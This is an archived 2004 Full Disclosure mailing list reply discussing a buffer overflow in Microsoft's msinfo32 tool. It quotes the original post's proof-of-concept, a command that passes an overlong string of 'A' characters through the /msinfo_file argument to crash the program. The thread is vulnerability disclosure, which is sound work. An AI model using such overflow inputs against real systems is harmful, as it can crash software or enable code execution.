Full Disclosure mailing list archives
RE: MSInfo Buffer Overflow
From: "joe" <mvp () joeware net>
Date: Mon, 30 Aug 2004 19:45:15 -0400
I think at best you could succeed in crashing the process or executing code in the context of the user running msinfo32. -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of E.Kellinis Sent: Monday, August 30, 2004 11:17 PM To: full-disclosure () lists netsys com Subject: [Full-disclosure] MSInfo Buffer Overflow <SNIP> Although in tests this bug wouldnt lead to dangerous situations.. I wouldnt bet 100% on that ! ===================== Proof Of Concept Code ===================== C:\Program Files\Common Files\Microsoft Shared\MSInfo> msinfo32 /msinfo_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MSInfo Buffer Overflow E.Kellinis (Aug 30)
- RE: MSInfo Buffer Overflow joe (Aug 30)